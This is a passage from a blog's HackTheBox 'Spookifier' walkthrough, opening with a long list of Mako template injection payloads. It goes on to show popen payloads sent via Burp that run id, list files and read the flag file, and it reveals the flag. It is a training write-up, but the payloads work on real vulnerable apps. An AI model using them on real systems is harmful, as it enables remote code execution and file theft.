class="variable">$&#123;self.module.cache.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.filters.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.filters.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.exceptions.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.exceptions.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.cache.util.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.cache.util.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.util.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.util.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.exceptions.traceback.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.exceptions.util.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.cache.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.cache.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.template.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.filters.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.runtime.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.cache.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template._mmarker.module.runtime.exceptions.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.filters.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.template.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template._mmarker.module.cache.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.exceptions.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.filters.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.cache.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.module.runtime.exceptions.compat.inspect.linecache.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template._mmarker.module.runtime.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.filters.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.runtime.compat.inspect.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.context._with_template.module.runtime.exceptions.util.os.system(&quot;id&quot;)&#125;</span></span><br><span class="line"><span class="variable">$&#123;self.template.module.runtime.exceptions.traceback.linecache.os.system(&quot;id&quot;)&#125;</span></span><br></pre></td></tr></table></figure></div>

<p>Capture the packet using Burpsuite and send to repeater</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/awh8x685bx7st9efbq6nd/14-1.png?rlkey=cznnn50lugr8873c8p66u1bz2&st=l7v6ceh1&dl=0"
                      alt="14.png"
                ></p>
<p>![[14 1.png]]</p>
<p>Now use the payloads</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/qd3ihg9swspeg4w4rrge6/15-1.png?rlkey=0e9ew3wzggvwt507k05gvnf31&st=ozn0rw17&dl=0"
                      alt="15.png"
                ></p>
<p>It just gave response with exit code “0”</p>
<p>Since the above payloads returned nothing , lets try popen</p>
<p>The code is available in <a class="link"   target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#mako" >here <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">x=os.popen(<span class="string">&#x27;id&#x27;</span>).read()</span><br><span class="line">%&gt;</span><br><span class="line">$&#123;x&#125;</span><br></pre></td></tr></table></figure></div>

<p>Now enter this in payload of burp packet</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%+x=self.module.runtime.util.os.popen(<span class="string">&#x27;id&#x27;</span>).<span class="built_in">read</span>()+%&gt;<span class="variable">$&#123;x&#125;</span></span><br></pre></td></tr></table></figure></div>

<p>Once you enter this you should be able to see the details of uid,gid , groups of the engine like the following</p>
<p>Now alter the above to list the directories</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/k2277xnd7isp6rvyia0ed/17.png?rlkey=2bzcfkhuazpo08d8yi3tmbu2r&st=ndb54uxz&dl=0"
                      alt="17.png"
                ></p>
<p>Now alter the above like the following to list the directories</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%+x=self.module.runtime.util.os.popen(<span class="string">&#x27;ls+-l&#x27;</span>).<span class="built_in">read</span>()+%&gt;<span class="variable">$&#123;x&#125;</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/e7wwb7s6c7wfy63odnac7/18.png?rlkey=79gmhb9r8laogk4sldqrqh2qw&st=daj21qy0&dl=0"
                      alt="18.png"
                ></p>
<p>Now , since flag is located in the same directory</p>
<p>alter the above payload into</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%+x=self.module.runtime.util.os.popen(<span class="string">&#x27;cat+/flag.txt&#x27;</span>).<span class="built_in">read</span>()+%&gt;<span class="variable">$&#123;x&#125;</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/e7wwb7s6c7wfy63odnac7/18.png?rlkey=79gmhb9r8laogk4sldqrqh2qw&st=daj21qy0&dl=0"
                      alt="19.png"
                ></p>
<details>
  <summary>Click to reveal the Flags</summary>
  Flag: HTB{t3mpl4t3_1nj3ct10n_C4n_3x1st5_4nywh343!!}
</details>


<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/uwtmwkh48hy8b15ievfjf/19.png?rlkey=mxc9y9idxxp29fjicp1cu4bke&st=ed3avlvu&dl=0"
                      alt="20.png"
                ></p>
<p><strong>Conclusion</strong></p>
<p>The Spookifier lab is a beginner-friendly challenge that effectively demonstrates the basics of template injection exploitation. The walkthrough showcased the process clearly, making it ideal for practicing and understanding this common web application vulnerability. The room focuses more on identifying the vulnerability and crafting the payload rather than complex post-exploitation techniques.</p>
<ul>
<li>Exploiting a template injection vulnerability in a Flask application.</li>
<li>Executing arbitrary code on the system using the vulnerability.</li>
<li>Utilizing the <code>os.popen()</code> function to access and read the flag file.</li>
</ul>

        </div>

        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/HackTheBox/">#HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/09/22/GoldenEye/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">GoldenEye</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'en-US',
          dark: 'body[class~="dark-mode"]',
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">Spookifier</div>
        

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">D K V V Varma</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        3 posts in total
                    </span>
                    
                </p>
            
        </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.2</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>



    
<script src="/js/tools/localSearch.js" type="module"></script>




    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
